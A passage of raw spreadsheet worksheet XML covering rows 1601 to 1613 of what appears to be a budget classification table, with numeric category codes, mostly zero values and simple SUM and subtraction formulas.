      <c r="V1601" s="12">
        <v>0</v>
      </c>
      <c r="W1601" s="12">
        <v>0</v>
      </c>
      <c r="X1601" s="12">
        <v>0</v>
      </c>
      <c r="Y1601" s="12">
        <v>0</v>
      </c>
      <c r="Z1601" s="12">
        <v>0</v>
      </c>
      <c r="AA1601" s="12">
        <v>0</v>
      </c>
      <c r="AB1601" s="12">
        <v>0</v>
      </c>
      <c r="AC1601" s="12">
        <v>0</v>
      </c>
      <c r="AD1601" s="12">
        <v>0</v>
      </c>
      <c r="AE1601" s="12">
        <f>AE1602</f>
        <v>0</v>
      </c>
      <c r="AF1601" s="12">
        <f>AF1602</f>
        <v>0</v>
      </c>
      <c r="AG1601" s="12">
        <f>AG1602</f>
        <v>0</v>
      </c>
      <c r="AH1601" s="12">
        <f>AH1602</f>
        <v>0</v>
      </c>
      <c r="AI1601" s="12">
        <f>AI1602</f>
        <v>0</v>
      </c>
      <c r="AJ1601" s="12">
        <f t="shared" ref="AJ1601:AP1601" si="785">AJ1602</f>
        <v>0</v>
      </c>
      <c r="AK1601" s="12">
        <f t="shared" si="785"/>
        <v>0</v>
      </c>
      <c r="AL1601" s="12">
        <f t="shared" si="785"/>
        <v>0</v>
      </c>
      <c r="AM1601" s="12">
        <f t="shared" si="785"/>
        <v>0</v>
      </c>
      <c r="AN1601" s="12">
        <f t="shared" si="785"/>
        <v>0</v>
      </c>
      <c r="AO1601" s="12">
        <f t="shared" si="785"/>
        <v>0</v>
      </c>
      <c r="AP1601" s="12">
        <f t="shared" si="785"/>
        <v>0</v>
      </c>
    </row>
    <row r="1602" ht="18" customHeight="1" spans="1:42">
      <c r="A1602" s="34"/>
      <c r="B1602" s="34"/>
      <c r="C1602" s="34"/>
      <c r="D1602" s="10">
        <v>20804</v>
      </c>
      <c r="E1602" s="11" t="s">
        <v>3396</v>
      </c>
      <c r="F1602" s="14">
        <f t="shared" si="763"/>
        <v>0</v>
      </c>
      <c r="G1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="H1602" s="12">
        <f>H1603</f>
        <v>0</v>
      </c>
      <c r="I1602" s="12">
        <f>I1603</f>
        <v>0</v>
      </c>
      <c r="J1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="K1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="L1602" s="12">
        <f>L1603</f>
        <v>0</v>
      </c>
      <c r="M1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="N1602" s="12">
        <f>N1603</f>
        <v>0</v>
      </c>
      <c r="O1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="P1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="Q1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="R1602" s="12">
        <f t="shared" si="784"/>
        <v>0</v>
      </c>
      <c r="S1602" s="12">
        <v>0</v>
      </c>
      <c r="T1602" s="12">
        <v>0</v>
      </c>
      <c r="U1602" s="12">
        <v>0</v>
      </c>
      <c r="V1602" s="12">
        <v>0</v>
      </c>
      <c r="W1602" s="12">
        <v>0</v>
      </c>
      <c r="X1602" s="12">
        <v>0</v>
      </c>
      <c r="Y1602" s="12">
        <v>0</v>
      </c>
      <c r="Z1602" s="12">
        <v>0</v>
      </c>
      <c r="AA1602" s="12">
        <v>0</v>
      </c>
      <c r="AB1602" s="12">
        <v>0</v>
      </c>
      <c r="AC1602" s="12">
        <v>0</v>
      </c>
      <c r="AD1602" s="12">
        <v>0</v>
      </c>
      <c r="AE1602" s="12">
        <f t="shared" ref="AE1602:AP1602" si="786">AE1603</f>
        <v>0</v>
      </c>
      <c r="AF1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AG1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AH1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AI1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AJ1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AK1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AL1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AM1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AN1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AO1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
      <c r="AP1602" s="12">
        <f t="shared" si="786"/>
        <v>0</v>
      </c>
    </row>
    <row r="1603" ht="18" customHeight="1" spans="1:42">
      <c r="A1603" s="34"/>
      <c r="B1603" s="34"/>
      <c r="C1603" s="34"/>
      <c r="D1603" s="10">
        <v>2080451</v>
      </c>
      <c r="E1603" s="16" t="s">
        <v>4226</v>
      </c>
      <c r="F1603" s="14">
        <f t="shared" si="763"/>
        <v>0</v>
      </c>
      <c r="G1603" s="17"/>
      <c r="H1603" s="17"/>
      <c r="I1603" s="17"/>
      <c r="J1603" s="17"/>
      <c r="K1603" s="17"/>
      <c r="L1603" s="17"/>
      <c r="M1603" s="17"/>
      <c r="N1603" s="17"/>
      <c r="O1603" s="17"/>
      <c r="P1603" s="17"/>
      <c r="Q1603" s="17"/>
      <c r="R1603" s="17"/>
      <c r="S1603" s="17"/>
      <c r="T1603" s="17"/>
      <c r="U1603" s="17"/>
      <c r="V1603" s="17"/>
      <c r="W1603" s="17"/>
      <c r="X1603" s="17"/>
      <c r="Y1603" s="17"/>
      <c r="Z1603" s="17"/>
      <c r="AA1603" s="17"/>
      <c r="AB1603" s="17"/>
      <c r="AC1603" s="17"/>
      <c r="AD1603" s="17"/>
      <c r="AE1603" s="17">
        <f>G1603-S1603</f>
        <v>0</v>
      </c>
      <c r="AF1603" s="17">
        <f t="shared" ref="AF1603:AP1603" si="787">H1603-T1603</f>
        <v>0</v>
      </c>
      <c r="AG1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AH1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AI1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AJ1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AK1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AL1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AM1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AN1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AO1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
      <c r="AP1603" s="17">
        <f t="shared" si="787"/>
        <v>0</v>
      </c>
    </row>
    <row r="1604" ht="18" customHeight="1" spans="1:42">
      <c r="A1604" s="34"/>
      <c r="B1604" s="34"/>
      <c r="C1604" s="34"/>
      <c r="D1604" s="10">
        <v>223</v>
      </c>
      <c r="E1604" s="11" t="s">
        <v>4227</v>
      </c>
      <c r="F1604" s="14">
        <f t="shared" si="763"/>
        <v>8</v>
      </c>
      <c r="G1604" s="12">
        <f t="shared" ref="G1604:R1604" si="788">G1605+G1616+G1626+G1628</f>
        <v>9</v>
      </c>
      <c r="H1604" s="12">
        <f t="shared" si="788"/>
        <v>4</v>
      </c>
      <c r="I1604" s="12">
        <f t="shared" si="788"/>
        <v>1</v>
      </c>
      <c r="J1604" s="12">
        <f t="shared" si="788"/>
        <v>5</v>
      </c>
      <c r="K1604" s="12">
        <f t="shared" si="788"/>
        <v>1</v>
      </c>
      <c r="L1604" s="12">
        <f t="shared" si="788"/>
        <v>0</v>
      </c>
      <c r="M1604" s="12">
        <f t="shared" si="788"/>
        <v>0</v>
      </c>
      <c r="N1604" s="12">
        <f t="shared" si="788"/>
        <v>0</v>
      </c>
      <c r="O1604" s="12">
        <f t="shared" si="788"/>
        <v>0</v>
      </c>
      <c r="P1604" s="12">
        <f t="shared" si="788"/>
        <v>1</v>
      </c>
      <c r="Q1604" s="12">
        <f t="shared" si="788"/>
        <v>0</v>
      </c>
      <c r="R1604" s="12">
        <f t="shared" si="788"/>
        <v>0</v>
      </c>
      <c r="S1604" s="12">
        <v>0</v>
      </c>
      <c r="T1604" s="12">
        <v>0</v>
      </c>
      <c r="U1604" s="12">
        <v>0</v>
      </c>
      <c r="V1604" s="12">
        <v>0</v>
      </c>
      <c r="W1604" s="12">
        <v>0</v>
      </c>
      <c r="X1604" s="12">
        <v>0</v>
      </c>
      <c r="Y1604" s="12">
        <v>0</v>
      </c>
      <c r="Z1604" s="12">
        <v>0</v>
      </c>
      <c r="AA1604" s="12">
        <v>0</v>
      </c>
      <c r="AB1604" s="12">
        <v>0</v>
      </c>
      <c r="AC1604" s="12">
        <v>0</v>
      </c>
      <c r="AD1604" s="12">
        <v>0</v>
      </c>
      <c r="AE1604" s="12">
        <f t="shared" ref="AE1604:AP1604" si="789">AE1605+AE1616+AE1626+AE1628</f>
        <v>9</v>
      </c>
      <c r="AF1604" s="12">
        <f t="shared" si="789"/>
        <v>4</v>
      </c>
      <c r="AG1604" s="12">
        <f t="shared" si="789"/>
        <v>1</v>
      </c>
      <c r="AH1604" s="12">
        <f t="shared" si="789"/>
        <v>5</v>
      </c>
      <c r="AI1604" s="12">
        <f t="shared" si="789"/>
        <v>1</v>
      </c>
      <c r="AJ1604" s="12">
        <f t="shared" si="789"/>
        <v>0</v>
      </c>
      <c r="AK1604" s="12">
        <f t="shared" si="789"/>
        <v>0</v>
      </c>
      <c r="AL1604" s="12">
        <f t="shared" si="789"/>
        <v>0</v>
      </c>
      <c r="AM1604" s="12">
        <f t="shared" si="789"/>
        <v>0</v>
      </c>
      <c r="AN1604" s="12">
        <f t="shared" si="789"/>
        <v>1</v>
      </c>
      <c r="AO1604" s="12">
        <f t="shared" si="789"/>
        <v>0</v>
      </c>
      <c r="AP1604" s="12">
        <f t="shared" si="789"/>
        <v>0</v>
      </c>
    </row>
    <row r="1605" ht="18" customHeight="1" spans="1:42">
      <c r="A1605" s="34"/>
      <c r="B1605" s="34"/>
      <c r="C1605" s="34"/>
      <c r="D1605" s="10">
        <v>22301</v>
      </c>
      <c r="E1605" s="11" t="s">
        <v>4228</v>
      </c>
      <c r="F1605" s="14">
        <f t="shared" si="763"/>
        <v>8</v>
      </c>
      <c r="G1605" s="12">
        <f t="shared" ref="G1605:R1605" si="790">SUM(G1606:G1615)</f>
        <v>9</v>
      </c>
      <c r="H1605" s="12">
        <f t="shared" si="790"/>
        <v>4</v>
      </c>
      <c r="I1605" s="12">
        <f t="shared" si="790"/>
        <v>1</v>
      </c>
      <c r="J1605" s="12">
        <f t="shared" si="790"/>
        <v>5</v>
      </c>
      <c r="K1605" s="12">
        <f t="shared" si="790"/>
        <v>1</v>
      </c>
      <c r="L1605" s="12">
        <f t="shared" si="790"/>
        <v>0</v>
      </c>
      <c r="M1605" s="12">
        <f t="shared" si="790"/>
        <v>0</v>
      </c>
      <c r="N1605" s="12">
        <f t="shared" si="790"/>
        <v>0</v>
      </c>
      <c r="O1605" s="12">
        <f t="shared" si="790"/>
        <v>0</v>
      </c>
      <c r="P1605" s="12">
        <f t="shared" si="790"/>
        <v>1</v>
      </c>
      <c r="Q1605" s="12">
        <f t="shared" si="790"/>
        <v>0</v>
      </c>
      <c r="R1605" s="12">
        <f t="shared" si="790"/>
        <v>0</v>
      </c>
      <c r="S1605" s="12">
        <v>0</v>
      </c>
      <c r="T1605" s="12">
        <v>0</v>
      </c>
      <c r="U1605" s="12">
        <v>0</v>
      </c>
      <c r="V1605" s="12">
        <v>0</v>
      </c>
      <c r="W1605" s="12">
        <v>0</v>
      </c>
      <c r="X1605" s="12">
        <v>0</v>
      </c>
      <c r="Y1605" s="12">
        <v>0</v>
      </c>
      <c r="Z1605" s="12">
        <v>0</v>
      </c>
      <c r="AA1605" s="12">
        <v>0</v>
      </c>
      <c r="AB1605" s="12">
        <v>0</v>
      </c>
      <c r="AC1605" s="12">
        <v>0</v>
      </c>
      <c r="AD1605" s="12">
        <v>0</v>
      </c>
      <c r="AE1605" s="12">
        <f t="shared" ref="AE1605:AP1605" si="791">SUM(AE1606:AE1615)</f>
        <v>9</v>
      </c>
      <c r="AF1605" s="12">
        <f t="shared" si="791"/>
        <v>4</v>
      </c>
      <c r="AG1605" s="12">
        <f t="shared" si="791"/>
        <v>1</v>
      </c>
      <c r="AH1605" s="12">
        <f t="shared" si="791"/>
        <v>5</v>
      </c>
      <c r="AI1605" s="12">
        <f t="shared" si="791"/>
        <v>1</v>
      </c>
      <c r="AJ1605" s="12">
        <f t="shared" si="791"/>
        <v>0</v>
      </c>
      <c r="AK1605" s="12">
        <f t="shared" si="791"/>
        <v>0</v>
      </c>
      <c r="AL1605" s="12">
        <f t="shared" si="791"/>
        <v>0</v>
      </c>
      <c r="AM1605" s="12">
        <f t="shared" si="791"/>
        <v>0</v>
      </c>
      <c r="AN1605" s="12">
        <f t="shared" si="791"/>
        <v>1</v>
      </c>
      <c r="AO1605" s="12">
        <f t="shared" si="791"/>
        <v>0</v>
      </c>
      <c r="AP1605" s="12">
        <f t="shared" si="791"/>
        <v>0</v>
      </c>
    </row>
    <row r="1606" ht="18" customHeight="1" spans="1:42">
      <c r="A1606" s="34"/>
      <c r="B1606" s="34"/>
      <c r="C1606" s="34"/>
      <c r="D1606" s="10">
        <v>2230101</v>
      </c>
      <c r="E1606" s="16" t="s">
        <v>4229</v>
      </c>
      <c r="F1606" s="14">
        <f t="shared" ref="F1606:F1656" si="792">SUM(I1606:R1606)</f>
        <v>0</v>
      </c>
      <c r="G1606" s="17"/>
      <c r="H1606" s="17"/>
      <c r="I1606" s="17"/>
      <c r="J1606" s="17"/>
      <c r="K1606" s="17"/>
      <c r="L1606" s="17"/>
      <c r="M1606" s="17"/>
      <c r="N1606" s="17"/>
      <c r="O1606" s="17"/>
      <c r="P1606" s="17"/>
      <c r="Q1606" s="17"/>
      <c r="R1606" s="17"/>
      <c r="S1606" s="17"/>
      <c r="T1606" s="17"/>
      <c r="U1606" s="17"/>
      <c r="V1606" s="17"/>
      <c r="W1606" s="17"/>
      <c r="X1606" s="17"/>
      <c r="Y1606" s="17"/>
      <c r="Z1606" s="17"/>
      <c r="AA1606" s="17"/>
      <c r="AB1606" s="17"/>
      <c r="AC1606" s="17"/>
      <c r="AD1606" s="17"/>
      <c r="AE1606" s="17">
        <f t="shared" ref="AE1606:AP1615" si="793">G1606-S1606</f>
        <v>0</v>
      </c>
      <c r="AF1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AG1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AH1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AI1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AJ1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AK1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AL1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AM1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AN1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AO1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AP1606" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
    </row>
    <row r="1607" ht="18" customHeight="1" spans="1:42">
      <c r="A1607" s="34"/>
      <c r="B1607" s="34"/>
      <c r="C1607" s="34"/>
      <c r="D1607" s="10">
        <v>2230102</v>
      </c>
      <c r="E1607" s="16" t="s">
        <v>4230</v>
      </c>
      <c r="F1607" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1607" s="17"/>
      <c r="H1607" s="17"/>
      <c r="I1607" s="17"/>
      <c r="J1607" s="17"/>
      <c r="K1607" s="17"/>
      <c r="L1607" s="17"/>
      <c r="M1607" s="17"/>
      <c r="N1607" s="17"/>
      <c r="O1607" s="17"/>
      <c r="P1607" s="17"/>
      <c r="Q1607" s="17"/>
      <c r="R1607" s="17"/>
      <c r="S1607" s="17"/>
      <c r="T1607" s="17"/>
      <c r="U1607" s="17"/>
      <c r="V1607" s="17"/>
      <c r="W1607" s="17"/>
      <c r="X1607" s="17"/>
      <c r="Y1607" s="17"/>
      <c r="Z1607" s="17"/>
      <c r="AA1607" s="17"/>
      <c r="AB1607" s="17"/>
      <c r="AC1607" s="17"/>
      <c r="AD1607" s="17"/>
      <c r="AE1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AF1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AG1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AH1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AI1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AJ1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AK1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AL1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AM1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AN1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AO1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AP1607" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
    </row>
    <row r="1608" ht="18" customHeight="1" spans="1:42">
      <c r="A1608" s="34"/>
      <c r="B1608" s="34"/>
      <c r="C1608" s="34"/>
      <c r="D1608" s="10">
        <v>2230103</v>
      </c>
      <c r="E1608" s="16" t="s">
        <v>4231</v>
      </c>
      <c r="F1608" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1608" s="17"/>
      <c r="H1608" s="17"/>
      <c r="I1608" s="17"/>
      <c r="J1608" s="17"/>
      <c r="K1608" s="17"/>
      <c r="L1608" s="17"/>
      <c r="M1608" s="17"/>
      <c r="N1608" s="17"/>
      <c r="O1608" s="17"/>
      <c r="P1608" s="17"/>
      <c r="Q1608" s="17"/>
      <c r="R1608" s="17"/>
      <c r="S1608" s="17"/>
      <c r="T1608" s="17"/>
      <c r="U1608" s="17"/>
      <c r="V1608" s="17"/>
      <c r="W1608" s="17"/>
      <c r="X1608" s="17"/>
      <c r="Y1608" s="17"/>
      <c r="Z1608" s="17"/>
      <c r="AA1608" s="17"/>
      <c r="AB1608" s="17"/>
      <c r="AC1608" s="17"/>
      <c r="AD1608" s="17"/>
      <c r="AE1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AF1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AG1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AH1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AI1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AJ1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AK1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AL1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AM1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AN1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AO1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AP1608" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
    </row>
    <row r="1609" ht="18" customHeight="1" spans="1:42">
      <c r="A1609" s="34"/>
      <c r="B1609" s="34"/>
      <c r="C1609" s="34"/>
      <c r="D1609" s="10">
        <v>2230104</v>
      </c>
      <c r="E1609" s="16" t="s">
        <v>4232</v>
      </c>
      <c r="F1609" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1609" s="17"/>
      <c r="H1609" s="17"/>
      <c r="I1609" s="17"/>
      <c r="J1609" s="17"/>
      <c r="K1609" s="17"/>
      <c r="L1609" s="17"/>
      <c r="M1609" s="17"/>
      <c r="N1609" s="17"/>
      <c r="O1609" s="17"/>
      <c r="P1609" s="17"/>
      <c r="Q1609" s="17"/>
      <c r="R1609" s="17"/>
      <c r="S1609" s="17"/>
      <c r="T1609" s="17"/>
      <c r="U1609" s="17"/>
      <c r="V1609" s="17"/>
      <c r="W1609" s="17"/>
      <c r="X1609" s="17"/>
      <c r="Y1609" s="17"/>
      <c r="Z1609" s="17"/>
      <c r="AA1609" s="17"/>
      <c r="AB1609" s="17"/>
      <c r="AC1609" s="17"/>
      <c r="AD1609" s="17"/>
      <c r="AE1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AF1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AG1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AH1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AI1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AJ1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AK1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AL1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AM1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AN1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AO1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AP1609" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
    </row>
    <row r="1610" ht="18" customHeight="1" spans="1:42">
      <c r="A1610" s="34"/>
      <c r="B1610" s="34"/>
      <c r="C1610" s="34"/>
      <c r="D1610" s="10">
        <v>2230105</v>
      </c>
      <c r="E1610" s="16" t="s">
        <v>4233</v>
      </c>
      <c r="F1610" s="14">
        <f t="shared" si="792"/>
        <v>8</v>
      </c>
      <c r="G1610" s="17">
        <v>9</v>
      </c>
      <c r="H1610" s="17">
        <v>4</v>
      </c>
      <c r="I1610" s="17">
        <v>1</v>
      </c>
      <c r="J1610" s="17">
        <v>5</v>
      </c>
      <c r="K1610" s="17">
        <v>1</v>
      </c>
      <c r="L1610" s="17"/>
      <c r="M1610" s="17"/>
      <c r="N1610" s="17"/>
      <c r="O1610" s="17"/>
      <c r="P1610" s="17">
        <v>1</v>
      </c>
      <c r="Q1610" s="17"/>
      <c r="R1610" s="17"/>
      <c r="S1610" s="17"/>
      <c r="T1610" s="17"/>
      <c r="U1610" s="17"/>
      <c r="V1610" s="17"/>
      <c r="W1610" s="17"/>
      <c r="X1610" s="17"/>
      <c r="Y1610" s="17"/>
      <c r="Z1610" s="17"/>
      <c r="AA1610" s="17"/>
      <c r="AB1610" s="17"/>
      <c r="AC1610" s="17"/>
      <c r="AD1610" s="17"/>
      <c r="AE1610" s="17">
        <f t="shared" si="793"/>
        <v>9</v>
      </c>
      <c r="AF1610" s="17">
        <f t="shared" si="793"/>
        <v>4</v>
      </c>
      <c r="AG1610" s="17">
        <f t="shared" si="793"/>
        <v>1</v>
      </c>
      <c r="AH1610" s="17">
        <f t="shared" si="793"/>
        <v>5</v>
      </c>
      <c r="AI1610" s="17">
        <f t="shared" si="793"/>
        <v>1</v>
      </c>
      <c r="AJ1610" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AK1610" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AL1610" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AM1610" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AN1610" s="17">
        <f t="shared" si="793"/>
        <v>1</v>
      </c>
      <c r="AO1610" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AP1610" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
    </row>
    <row r="1611" ht="18" customHeight="1" spans="1:42">
      <c r="A1611" s="34"/>
      <c r="B1611" s="34"/>
      <c r="C1611" s="34"/>
      <c r="D1611" s="10">
        <v>2230106</v>
      </c>
      <c r="E1611" s="16" t="s">
        <v>4234</v>
      </c>
      <c r="F1611" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1611" s="17"/>
      <c r="H1611" s="17"/>
      <c r="I1611" s="17"/>
      <c r="J1611" s="17"/>
      <c r="K1611" s="17"/>
      <c r="L1611" s="17"/>
      <c r="M1611" s="17"/>
      <c r="N1611" s="17"/>
      <c r="O1611" s="17"/>
      <c r="P1611" s="17"/>
      <c r="Q1611" s="17"/>
      <c r="R1611" s="17"/>
      <c r="S1611" s="17"/>
      <c r="T1611" s="17"/>
      <c r="U1611" s="17"/>
      <c r="V1611" s="17"/>
      <c r="W1611" s="17"/>
      <c r="X1611" s="17"/>
      <c r="Y1611" s="17"/>
      <c r="Z1611" s="17"/>
      <c r="AA1611" s="17"/>
      <c r="AB1611" s="17"/>
      <c r="AC1611" s="17"/>
      <c r="AD1611" s="17"/>
      <c r="AE1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AF1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AG1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AH1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AI1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AJ1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AK1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AL1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AM1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AN1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AO1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AP1611" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
    </row>
    <row r="1612" ht="18" customHeight="1" spans="1:42">
      <c r="A1612" s="34"/>
      <c r="B1612" s="34"/>
      <c r="C1612" s="34"/>
      <c r="D1612" s="10">
        <v>2230107</v>
      </c>
      <c r="E1612" s="16" t="s">
        <v>4235</v>
      </c>
      <c r="F1612" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1612" s="17"/>
      <c r="H1612" s="17"/>
      <c r="I1612" s="17"/>
      <c r="J1612" s="17"/>
      <c r="K1612" s="17"/>
      <c r="L1612" s="17"/>
      <c r="M1612" s="17"/>
      <c r="N1612" s="17"/>
      <c r="O1612" s="17"/>
      <c r="P1612" s="17"/>
      <c r="Q1612" s="17"/>
      <c r="R1612" s="17"/>
      <c r="S1612" s="17"/>
      <c r="T1612" s="17"/>
      <c r="U1612" s="17"/>
      <c r="V1612" s="17"/>
      <c r="W1612" s="17"/>
      <c r="X1612" s="17"/>
      <c r="Y1612" s="17"/>
      <c r="Z1612" s="17"/>
      <c r="AA1612" s="17"/>
      <c r="AB1612" s="17"/>
      <c r="AC1612" s="17"/>
      <c r="AD1612" s="17"/>
      <c r="AE1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AF1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AG1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AH1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AI1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AJ1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AK1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AL1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AM1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AN1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AO1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
      <c r="AP1612" s="17">
        <f t="shared" si="793"/>
        <v>0</v>
      </c>
    </row>
    <row r="1613" ht="18" customHeight="1" spans="1:42">
      <c r="A1613" s="34"/>
      <c r="B1613" s="34"/>
      <c r="C1613" s="34"/>
      <c r="D1613" s="10">
        <v>2230108</v>
      </c>
      <c r="E1613" s="16" t="s">
        <v>4236</v>
      </c>
      <c r="F1613" s="14">
        <f t="shared" si="792"/>
        <v>0</v>
      </c>
      <c r="G1613" s="17"/>
      <c r="H1613" s="17"/>
      <c r="I1613" s="17"/>
      <c r="J1613" s="17"/>
      <c r="K1613" s="17"/>
      <c r="L1613" s="17"/>
      <c r="M1613" s="17"/>
      <c r="N1613" s="17"/>
      <c r="O1613" s="17"/>
      <c r="P1613" s="17"/>
      <c r="Q1613" s="17"/>
